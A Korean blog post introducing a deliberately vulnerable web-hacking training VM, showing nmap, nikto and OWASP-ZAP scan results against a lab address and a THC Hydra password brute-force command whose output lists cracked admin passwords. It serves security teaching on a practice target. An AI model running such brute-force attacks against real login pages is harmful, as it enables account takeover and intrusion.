홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 WH-Account-02: 회원정보 갱신시 정보처리가 취약한 웹해킹훈련장 (소개)이 훈련장에서는 기존 사용자의 회원정보 수정시 입력 검증이 미비하여 발생하는 취약점을 다룬다. 실제 서비스에서 자주 발견되는 취약점이다. WH-Account-01 훈련장의 회원가입 취약점보다는 많은 빈도로 나타난다. 회원정보 수정 과정에서 관리자 권한을 획득하고 관리 기능을 이용하여 웹서버에 침투할 수 있다. 여기서는 부팅 과정을 소개하고, 각종 공개 취약점 스캐너로 점검한 결과를 수록하였다.
위의 파일을 내려받아서 적당한 위치에 저장한다.
VMWare Player나 VirtualBox를 이용하여 손님운영체제로 구동한다.
이때 메모리는 256MB이상이면 되고, 가상디스크는 설정하지 않아도 된다.
부팅이 끝나면
위 그림은 파이어폭스에서 WH-Account-02 훈련장( nmap 탐색 결과
root@kali:~# nmap -A 192.168.189.238 Starting Nmap 7.31 ( https://nmap.org ) at 2017-01-03 22:13 KST Nmap scan report for 192.168.189.238 Host is up (0.00047s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd |_http-server-header: Apache |_http-title: \xEC\xB7\xA8\xEC\x95\xBD\xED\x95\x9C \xED\x9A\x8C\xEC\x9B\x90\xEC\xA0\x95\xEB\xB3\xB4 \xEC\xB2\x98\xEB\xA6\xAC ::: \xEC\x9B\xB9\xED\x95\xB4\xED\x82\xB9/\xED\x99\x88\xED\x8E\x98\xEC\x9D\xB4\xEC\xA7\x80\xEC\xB7\xA8\xEC\x95\xBD... MAC Address: 00:0C:29:E3:3F:16 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.36 - 2.6.37, Linux 2.6.37 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.47 ms 192.168.189.238 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds root@kali:~#
WH-Account-02 훈련장 서버는 80 포트에서 nikto 스캐너 탐색 결과
80포트에서 HTTP 서비스가 발견되었으므로 root@kali:~# nikto -host 192.168.189.238 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.189.238 + Target Hostname: 192.168.189.238 + Target Port: 80 + Start Time: 2017-01-03 22:15:39 (GMT9) --------------------------------------------------------------------------- + Server: Apache + Cookie PHPSESSID created without the httponly flag + No CGI Directories found (use '-C all' to force check all possible dirs) + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + 7535 requests: 0 error(s) and 2 item(s) reported on remote host + End Time: 2017-01-03 22:15:51 (GMT9) (12 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@kali:~#
세션 쿠키인 OWASP-ZAP의 웹 어플리케이션 취약점 탐색 결과
OWASP-ZAP의 "
OWASP-ZAP에서는
비밀번호 무작위 대입 공격(THC Hydra)
WH-Account-02 누리집은 사용자 로그인 기능이 있다.
비밀번호가 취약하게 설정된 시험 계정이나 관리자 계정이 존재하는 지 [HTTP 요청] POST http://192.168.189.238/login.php HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://192.168.189.238/ Cookie: PHPSESSID=teklb6i4v9uc61bcol5c1t0im0; pass=fb621f5060b9f65acf8eb4232e3024140dea2b34 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 23 Host: 192.168.189.238 userId=USER&userPw=PASS [HTTP 응답] HTTP/1.1 200 OK Date: Tue, 03 Jan 2017 22:23:33 GMT Server: Apache X-Frame-Options: DENY X-XSS-Protection: 1 X-Content-Type-Options: nosniff Content-Length: 60 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html <script>alert('ID does not exist.');history.back();</script>
위의 HTTP 응답에서 ID가 존재하지 않을 때는
root@kali:~# hydra 192.168.189.238 http-form-post "/login.php:userId=^USER^&userPw=^PASS^:history.back" -L weakuser.txt -P weakpass.txt Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2017-01-03 22:25:52 [DATA] max 16 tasks per 1 server, overall 64 tasks, 9612 login tries (l:18/p:534), ~9 tries per task [DATA] attacking service http-post-form on port 80 [80][http-post-form] host: 192.168.189.238 login: admin password: 123456 [80][http-post-form] host: 192.168.189.238 login: admin password: password [80][http-post-form] host: 192.168.189.238 login: admin password: 12345678 [80][http-post-form] host: 192.168.189.238 login: admin password: 123456789 [80][http-post-form] host: 192.168.189.238 login: admin password: qwerty [80][http-post-form] host: 192.168.189.238 login: admin password: 12345 [80][http-post-form] host: 192.168.189.238 login: admin password: 1234 [80][http-post-form] host: 192.168.189.238 login: admin password: 111111 [80][http-post-form] host: 192.168.189.238 login: admin password: 1234567 [80][http-post-form] host: 192.168.189.238 login: admin password: dragon [80][http-post-form] host: 192.168.189.238 login: admin password: 123123 [80][http-post-form] host: 192.168.189.238 login: admin password: baseball [80][http-post-form] host: 192.168.189.238 login: admin password: abc123 [80][http-post-form] host: 192.168.189.238 login: admin password: football [80][http-post-form] host: 192.168.189.238 login: admin password: monkey [80][http-post-form] host: 192.168.189.238 login: admin password: letmein [STATUS] 2365.00 tries/min, 2365 tries in 00:01h, 7247 to do in 00:04h, 16 active [STATUS] 2056.67 tries/min, 6170 tries in 00:03h, 3442 to do in 00:02h, 16 active [STATUS] 2018.25 tries/min, 8073 tries in 00:04h, 1539 to do in 00:01h, 16 active 1 of 1 target successfully completed, 16 valid passwords found Hydra (http://www.thc.org/thc-hydra) finished at 2017-01-03 22:30:41 root@kali:~#
[ID=admin일 경우의 HTTP 응답] HTTP/1.1 302 Found Date: Tue, 03 Jan 2017 22:31:52 GMT Server: Apache X-Frame-Options: DENY X-XSS-Protection: 1 X-Content-Type-Options: nosniff Location: index.php Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html
로그인 과정에서 존재하지 않는 ID일 경우에는
마무리공개용 취약점 점검 도구로는 다음과 같은 결론을 얻을 수 있다.
위와 같은 결과를 바탕으로 수동점검에서는 HTTP 통신을 분석하면서 XSS 취약점이나 회원가입시에 존재할 수 있는 취약점을 점검하면 된다. 이 훈련장은 WH-Account-01 훈련장에서 회원가입시의 취약점과 파일 업로드 취약점 일부를 수정하여 구현하였다. 따라서 WH-Account-01 훈련장 실습을 선행할 것을 권한다. [처음 작성한 날: 2017.01.03] [마지막으로 고친 날: 2017.01.03] < 이전 글 : WH-Account-01 웹해킹훈련장 실습 설명서 (2017.01.03) > 다음 글 : WH-Account-02 웹해킹훈련장 실습 설명서 (2017.01.04) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |